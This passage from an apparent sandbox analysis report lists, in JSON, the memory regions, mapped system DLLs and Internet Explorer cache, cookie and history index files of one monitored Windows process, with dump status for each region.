2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_1642", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:01:16.143", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4067327, "entry_point": 0, "filename": null, "id": "region_1643", "name": "pagefile_0x00000000003e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4063232, "timestamp": "00:01:16.143", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 376832, "start_va": 25559040, "type": "region", "version": 1 }, "end_va": 25935871, "entry_point": 25703865, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_1644", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 25559040, "timestamp": "00:01:16.148", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1966342144, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1966346465, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1646", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1966342144, "timestamp": "00:01:16.153", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1939668992, "type": "region", "version": 1 }, "end_va": 1939931135, "entry_point": 1939710685, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_1647", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1939668992, "timestamp": "00:01:16.155", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000011-region_00001648-addr_0x0000000001aa0000-size_0x0000000000170000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_287", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1507328, "start_va": 27918336, "type": "region", "version": 1 }, "end_va": 29425663, "entry_point": 0, "filename": null, "id": "region_1648", "name": "private_0x0000000001aa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 27918336, "timestamp": "00:01:16.157", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 25559040, "type": "region", "version": 1 }, "end_va": 26472447, "entry_point": 0, "filename": null, "id": "region_1649", "name": "pagefile_0x0000000001860000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 25559040, "timestamp": "00:01:16.158", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000011-region_00001650-addr_0x0000000000430000-size_0x0000000000024000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_288", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 147456, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 4538367, "entry_point": 0, "filename": null, "id": "region_1650", "name": "private_0x0000000000430000", "norm_filename": null, "region_type": "private_memory", "start_va": 4390912, "timestamp": "00:01:16.163", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1028096, "start_va": 1935540224, "type": "region", "version": 1 }, "end_va": 1936568319, "entry_point": 1935611873, "filename": "\\Windows\\System32\\WindowsCodecs.dll", "id": "region_1651", "name": "windowscodecs.dll", "norm_filename": "c:\\windows\\system32\\windowscodecs.dll", "region_type": "memory_mapped_file", "start_va": 1935540224, "timestamp": "00:01:16.164", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4198399, "entry_point": 0, "filename": null, "id": "region_1652", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:16.168", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000011-region_00001653-addr_0x0000000000410000-size_0x0000000000009000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_289", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 36864, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 4296703, "entry_point": 0, "filename": null, "id": "region_1653", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:01:16.168", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000011-region_00001654-addr_0x0000000001940000-size_0x0000000000024000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_290", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 147456, "start_va": 26476544, "type": "region", "version": 1 }, "end_va": 26623999, "entry_point": 0, "filename": null, "id": "region_1654", "name": "private_0x0000000001940000", "norm_filename": null, "region_type": "private_memory", "start_va": 26476544, "timestamp": "00:01:16.169", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000011-region_00001655-addr_0x0000000001970000-size_0x0000000000009000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_291", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 36864, "start_va": 26673152, "type": "region", "version": 1 }, "end_va": 26710015, "entry_point": 0, "filename": null, "id": "region_1655", "name": "private_0x0000000001970000", "norm_filename": null, "region_type": "private_memory", "start_va": 26673152, "timestamp": "00:01:16.169", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 27918336, "type": "region", "version": 1 }, "end_va": 28966911, "entry_point": 0, "filename": null, "id": "region_1656", "name": "private_0x0000000001aa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 27918336, "timestamp": "00:01:16.170", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 29163520, "type": "region", "version": 1 }, "end_va": 29425663, "entry_point": 0, "filename": null, "id": "region_1657", "name": "private_0x0000000001bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 29163520, "timestamp": "00:01:16.170", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1901133824, "type": "region", "version": 1 }, "end_va": 1901445119, "entry_point": 1901145108, "filename": "\\Windows\\System32\\apphelp.dll", "id": "region_1658", "name": "apphelp.dll", "norm_filename": "c:\\windows\\system32\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 1901133824, "timestamp": "00:01:16.170", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20275200, "start_va": 1628700672, "type": "region", "version": 1 }, "end_va": 1648975871, "entry_point": 1628700672, "filename": "\\Windows\\System32\\imageres.dll", "id": "region_1659", "name": "imageres.dll", "norm_filename": "c:\\windows\\system32\\imageres.dll", "region_type": "memory_mapped_file", "start_va": 1628700672, "timestamp": "00:01:16.175", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 294912, "start_va": 29425664, "type": "region", "version": 1 }, "end_va": 29720575, "entry_point": 0, "filename": null, "id": "region_1660", "name": "private_0x0000000001c10000", "norm_filename": null, "region_type": "private_memory", "start_va": 29425664, "timestamp": "00:01:16.178", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20275200, "start_va": 1649016832, "type": "region", "version": 1 }, "end_va": 1669292031, "entry_point": 1649016832, "filename": "\\Windows\\System32\\imageres.dll", "id": "region_1661", "name": "imageres.dll", "norm_filename": "c:\\windows\\system32\\imageres.dll", "region_type": "memory_mapped_file", "start_va": 1649016832, "timestamp": "00:01:16.178", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 73728, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 4464639, "entry_point": 0, "filename": null, "id": "region_1664", "name": "private_0x0000000000430000", "norm_filename": null, "region_type": "private_memory", "start_va": 4390912, "timestamp": "00:01:16.188", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 294912, "start_va": 29753344, "type": "region", "version": 1 }, "end_va": 30048255, "entry_point": 0, "filename": null, "id": "region_1668", "name": "private_0x0000000001c60000", "norm_filename": null, "region_type": "private_memory", "start_va": 29753344, "timestamp": "00:01:16.200", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 73728, "start_va": 26476544, "type": "region", "version": 1 }, "end_va": 26550271, "entry_point": 0, "filename": null, "id": "region_1672", "name": "private_0x0000000001940000", "norm_filename": null, "region_type": "private_memory", "start_va": 26476544, "timestamp": "00:01:16.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 73728, "start_va": 26607616, "type": "region", "version": 1 }, "end_va": 26681343, "entry_point": 0, "filename": null, "id": "region_1676", "name": "private_0x0000000001960000", "norm_filename": null, "region_type": "private_memory", "start_va": 26607616, "timestamp": "00:01:16.221", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 4313087, "entry_point": 0, "filename": null, "id": "region_1677", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:01:16.224", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1966211072, "type": "region", "version": 1 }, "end_va": 1966321663, "entry_point": 1966248889, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_1678", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1966211072, "timestamp": "00:01:16.226", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 53248, "start_va": 4521984, "type": "region", "version": 1 }, "end_va": 4575231, "entry_point": 0, "filename": null, "id": "region_1679", "name": "private_0x0000000000450000", "norm_filename": null, "region_type": "private_memory", "start_va": 4521984, "timestamp": "00:01:16.230", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 164495360, "type": "region", "version": 1 }, "end_va": 165543935, "entry_point": 0, "filename": null, "id": "region_1680", "name": "private_0x0000000009ce0000", "norm_filename": null, "region_type": "private_memory", "start_va": 164495360, "timestamp": "00:01:17.557", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_1681", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:01:17.557", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1970065407, "entry_point": 1968903562, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_1682", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:01:17.558", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967521792, "type": "region", "version": 1 }, "end_va": 1967570943, "entry_point": 1967530894, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_1683", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1967521792, "timestamp": "00:01:17.559", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1995440128, "type": "region", "version": 1 }, "end_va": 1996709887, "entry_point": 1995447093, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_1684", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1995440128, "timestamp": "00:01:17.561", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1996750848, "type": "region", "version": 1 }, "end_va": 1997754367, "entry_point": 1996757093, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_1685", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1996750848, "timestamp": "00:01:17.562", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1992687616, "type": "region", "version": 1 }, "end_va": 1994764287, "entry_point": 1992696537, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_1686", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1992687616, "timestamp": "00:01:17.563", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1957625856, "type": "region", "version": 1 }, "end_va": 1957720063, "entry_point": 1957633181, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_1687", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1957625856, "timestamp": "00:01:17.566", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967108095, "entry_point": 1967069586, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_1688", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:17.567", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1947729920, "type": "region", "version": 1 }, "end_va": 1947783167, "entry_point": 1947734496, "filename": "\\Windows\\System32\\wtsapi32.dll", "id": "region_1689", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\system32\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1947729920, "timestamp": "00:01:17.576", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 31129600, "type": "region", "version": 1 }, "end_va": 32178175, "entry_point": 0, "filename": null, "id": "region_1690", "name": "private_0x0000000001db0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31129600, "timestamp": "00:01:17.582", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_1691", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:01:17.582", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 94208, "start_va": 26738688, "type": "region", "version": 1 }, "end_va": 26832895, "entry_point": 0, "filename": null, "id": "region_1692", "name": "pagefile_0x0000000001980000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 26738688, "timestamp": "00:01:17.583", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1961295872, "type": "region", "version": 1 }, "end_va": 1961385983, "entry_point": 1961307587, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_1693", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1961295872, "timestamp": "00:01:20.583", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 30081024, "type": "region", "version": 1 }, "end_va": 30326783, "entry_point": 30085773, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1694", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 30081024, "timestamp": "00:01:20.584", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1958871040, "type": "region", "version": 1 }, "end_va": 1959112703, "entry_point": 1958875789, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1699", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1958871040, "timestamp": "00:01:20.596", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000011-region_00001700-addr_0x0000000001980000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_292", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 26738688, "type": "region", "version": 1 }, "end_va": 26804223, "entry_point": 0, "filename": null, "id": "region_1700", "name": "private_0x0000000001980000", "norm_filename": null, "region_type": "private_memory", "start_va": 26738688, "timestamp": "00:01:21.581", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 26804224, "type": "region", "version": 1 }, "end_va": 26836991, "entry_point": 0, "filename": null, "id": "region_1701", "name": "pagefile_0x0000000001990000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 26804224, "timestamp": "00:01:21.582", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 26738688, "type": "region", "version": 1 }, "end_va": 26771455, "entry_point": 0, "filename": null, "id": "region_1702", "name": "pagefile_0x0000000001980000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 26738688, "timestamp": "00:01:21.583", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 26738688, "type": "region", "version": 1 }, "end_va": 26746879, "entry_point": 0, "filename": null, "id": "region_1757", "name": "pagefile_0x0000000001980000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 26738688, "timestamp": "00:01:21.640", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 26804224, "type": "region", "version": 1 }, "end_va": 26869759, "entry_point": 26804224, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_1758", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 26804224, "timestamp": "00:01:21.640", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 28966912, "type": "region", "version": 1 }, "end_va": 28999679, "entry_point": 28966912, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_1759", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 28966912, "timestamp": "00:01:21.641", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 29032448, "type": "region", "version": 1 }, "end_va": 29097983, "entry_point": 29032448, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_1760", "name": "index.dat", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 29032448, "timestamp": "00:01:21.642", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1954545664, "type": "region", "version": 1 }, "end_va": 1954680831, "entry_point": 1954550878, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_1761", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1954545664, "timestamp": "00:01:21.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 2000814080, "type": "region", "version": 1 }, "end_va": 2001096703, "entry_point": 2000818657, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_1762", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 2000814080, "timestamp": "00:01:21.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1989541888, "type": "region", "version": 1 }, "end_va": 1989758975, "entry_point": 1989547101, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_1763", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1989541888, "timestamp": "00:01:21.652", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 2000551936, "type": "region", "version": 1 }, "end_va": 2000576511, "entry_point": 2000557954, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_1764", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 2000551936, "timestamp": "00:01:21.653", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000011-region_00001765-addr_0x0000000001eb0000-size_0x0000000000160000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_293", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1441792, "start_va": 32178176, "type": "region", "version": 1 }, "end_va": 33619967, "entry_point": 0, "filename": null, "id": "region_1765", "name": "private_0x0000000001eb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32178176, "timestamp": "00:01:21.654", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 278528, "start_va": 1959788544, "type": "region", "version": 1 }, "end_va": 1960067071, "entry_point": 1959879673, "filename": "\\Windows\\System32\\dnsapi.dll", "id": "region_1766", "name": "dnsapi.dll", "norm_filename": "c:\\windows\\system32\\dnsapi.dll", "region_type": "memory_mapped_file", "start_va": 1959788544, "timestamp": "00:01:21.659", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000011-region_00001767-addr_0x0000000002010000-size_0x0000000000140000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_294", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1310720, "start_va": 33619968, "type": "region", "version": 1 }, "end_va": 34930687, "entry_point": 0, "filename": null, "id": "region_1767", "name": "private_0x0000000002010000", "norm_filename": null, "region_type": "private_memory", "start_va": 33619968, "timestamp": "00:01:21.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1947140096, "type": "region", "version": 1 }, "end_va": 1947254783, "entry_point": 1947182129, "filename": "\\Windows\\System32\\IPHLPAPI.DLL", "id": "region_1768", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\system32\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1947140096, "timestamp": "00:01:21.661", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1947074560, "type": "region", "version": 1 }, "end_va": 1947103231, "entry_point": 1947079309, "filename": "\\Windows\\System32\\winnsi.dll", "id": "region_1769", "name": "winnsi.dll", "norm_filename": "c:\\windows\\system32\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1947074560, "timestamp": "00:01:21.662", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1971912704, "type": "region", "version": 1 }, "end_va": 1971924991, "entry_point": 1971912704, 